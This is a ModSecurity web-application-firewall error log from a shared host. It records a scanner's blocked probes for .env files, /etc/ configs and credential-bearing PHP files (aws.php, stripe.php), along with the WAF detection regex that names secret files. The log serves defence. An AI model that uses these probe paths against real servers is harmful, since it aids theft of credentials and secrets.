[Tue May 26 13:17:28.641932 2026] [security2:error] [pid 501489:tid 501696] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/backend-api/.env"] [unique_id "ahVQEGkFNZ9cRlz80IjRWAAAANE"]
[Tue May 26 13:17:29.179248 2026] [security2:error] [pid 501489:tid 501676] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/backup/.env"] [unique_id "ahVQEWkFNZ9cRlz80IjRcAAAAL0"]
[Tue May 26 13:17:29.206037 2026] [security2:error] [pid 501489:tid 501720] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/be/.env"] [unique_id "ahVQEWkFNZ9cRlz80IjRcQAAAOk"]
[Tue May 26 13:17:29.267773 2026] [security2:error] [pid 501489:tid 501680] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/beta/.env"] [unique_id "ahVQEWkFNZ9cRlz80IjRcwAAAME"]
[Tue May 26 13:17:29.816974 2026] [security2:error] [pid 501489:tid 501749] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/cms/.env"] [unique_id "ahVQEWkFNZ9cRlz80IjRhAAAAQI"]
[Tue May 26 13:17:29.922930 2026] [security2:error] [pid 501489:tid 501713] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/client/.env"] [unique_id "ahVQEWkFNZ9cRlz80IjRkgAAAOI"]
[Tue May 26 13:17:29.950862 2026] [security2:error] [pid 501489:tid 501739] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config.php"] [unique_id "ahVQEWkFNZ9cRlz80IjRlwAAAPg"]
[Tue May 26 13:17:30.072455 2026] [security2:error] [pid 501489:tid 501637] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/config/.env"] [unique_id "ahVQEmkFNZ9cRlz80IjRpAAAAJc"]
[Tue May 26 13:17:30.110771 2026] [security2:error] [pid 501489:tid 501690] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/aws.php"] [unique_id "ahVQEmkFNZ9cRlz80IjRrAAAAMs"]
[Tue May 26 13:17:30.127698 2026] [security2:error] [pid 501489:tid 501656] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/config.inc.php"] [unique_id "ahVQEmkFNZ9cRlz80IjRrQAAAKk"]
[Tue May 26 13:17:30.157599 2026] [security2:error] [pid 501489:tid 501678] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/config.php"] [unique_id "ahVQEmkFNZ9cRlz80IjRrwAAAL8"]
[Tue May 26 13:17:30.231460 2026] [security2:error] [pid 501489:tid 501630] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/env.php"] [unique_id "ahVQEmkFNZ9cRlz80IjRsgAAAJA"]
[Tue May 26 13:17:30.264898 2026] [security2:error] [pid 501489:tid 501695] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/module.config.php"] [unique_id "ahVQEmkFNZ9cRlz80IjRtQAAANA"]
[Tue May 26 13:17:30.281738 2026] [security2:error] [pid 501489:tid 501633] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQEWkFNZ9cRlz80IjRigAAAJM"]
[Tue May 26 13:17:30.386953 2026] [security2:error] [pid 501489:tid 501703] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/stripe.php"] [unique_id "ahVQEmkFNZ9cRlz80IjRvgAAANg"]
[Tue May 26 13:17:30.407934 2026] [security2:error] [pid 501489:tid 501740] [client 4.201.75.230:26380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahVQEmkFNZ9cRlz80IjRwQAAAPk"]
[Tue May 26 13:17:30.423002 2026] [security2:error] [pid 501489:tid 501651] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/nexmo.php"] [unique_id "ahVQEmkFNZ9cRlz80IjRxgAAAKQ"]
[Tue May 26 13:17:30.608819 2026] [security2:error] [pid 501489:tid 501696] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/crm/.env"] [unique_id "ahVQEmkFNZ9cRlz80IjR1QAAANE"]
[Tue May 26 13:17:30.630358 2026] [security2:error] [pid 501489:tid 501743] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/cron/.env"] [unique_id "ahVQEmkFNZ9cRlz80IjR2wAAAPw"]
[Tue May 26 13:17:30.662140 2026] [security2:error] [pid 501489:tid 501725] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/current/.env"] [unique_id "ahVQEmkFNZ9cRlz80IjR3wAAAO0"]
[Tue May 26 13:17:30.695311 2026] [security2:error] [pid 501489:tid 501691] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/demo/.env"] [unique_id "ahVQEmkFNZ9cRlz80IjR5QAAAMw"]
[Tue May 26 13:17:30.750696 2026] [security2:error] [pid 501489:tid 501621] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/dev/.env"] [unique_id "ahVQEmkFNZ9cRlz80IjR6wAAAIc"]
[Tue May 26 13:17:30.764063 2026] [security2:error] [pid 501489:tid 501624] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/develop/.env"] [unique_id "ahVQEmkFNZ9cRlz80IjR7AAAAIo"]
[Tue May 26 13:17:30.770105 2026] [security2:error] [pid 501489:tid 501750] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/developer/.env"] [unique_id "ahVQEmkFNZ9cRlz80IjR7QAAAQM"]
[Tue May 26 13:17:30.935374 2026] [security2:error] [pid 501489:tid 501674] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/development/.env"] [unique_id "ahVQEmkFNZ9cRlz80IjR-gAAALs"]
[Tue May 26 13:17:31.011633 2026] [security2:error] [pid 501489:tid 501626] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/erp/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSBAAAAIw"]
[Tue May 26 13:17:31.030129 2026] [security2:error] [pid 501489:tid 501746] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/etc/apache2/apache2.conf"] [unique_id "ahVQE2kFNZ9cRlz80IjSBwAAAP8"]
[Tue May 26 13:17:31.046901 2026] [security2:error] [pid 501489:tid 501667] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/etc/boto.cfg"] [unique_id "ahVQE2kFNZ9cRlz80IjSCAAAALQ"]
[Tue May 26 13:17:31.070431 2026] [security2:error] [pid 501489:tid 501698] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/fe/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSCwAAANM"]
[Tue May 26 13:17:31.109529 2026] [security2:error] [pid 501489:tid 501658] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/frontend/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSEAAAAKs"]
[Tue May 26 13:17:31.109945 2026] [security2:error] [pid 501489:tid 501693] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/front/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSEQAAAM4"]
[Tue May 26 13:17:31.219322 2026] [security2:error] [pid 501489:tid 501731] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/info.php"] [unique_id "ahVQE2kFNZ9cRlz80IjSIQAAAPE"]
[Tue May 26 13:17:31.232432 2026] [security2:error] [pid 501489:tid 501735] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/infophp.php"] [unique_id "ahVQE2kFNZ9cRlz80IjSIwAAAPU"]
[Tue May 26 13:17:31.234853 2026] [security2:error] [pid 501489:tid 501723] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/infos.php"] [unique_id "ahVQE2kFNZ9cRlz80IjSJAAAAOs"]
[Tue May 26 13:17:31.265545 2026] [security2:error] [pid 501489:tid 501701] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/laravel/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSJwAAANY"]
[Tue May 26 13:17:31.273355 2026] [security2:error] [pid 501489:tid 501625] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/lms/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSKQAAAIs"]
[Tue May 26 13:17:31.282144 2026] [security2:error] [pid 501489:tid 501718] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/local/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSKgAAAOc"]
[Tue May 26 13:17:31.339388 2026] [security2:error] [pid 501489:tid 501749] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/market/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSMQAAAQI"]
[Tue May 26 13:17:31.354412 2026] [security2:error] [pid 501489:tid 501719] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/marketing/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSMgAAAOg"]
[Tue May 26 13:17:31.421223 2026] [security2:error] [pid 501489:tid 501640] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/new/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSOgAAAJo"]
[Tue May 26 13:17:31.430830 2026] [security2:error] [pid 501489:tid 501621] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/node-api/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSOwAAAIc"]
[Tue May 26 13:17:31.434284 2026] [security2:error] [pid 501489:tid 501652] [client 4.201.75.230:5913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bigbootyhoez.com.md-74.webhostbox.net"] [uri "/an.php"] [unique_id "ahVQE2kFNZ9cRlz80IjSPAAAAKU"]
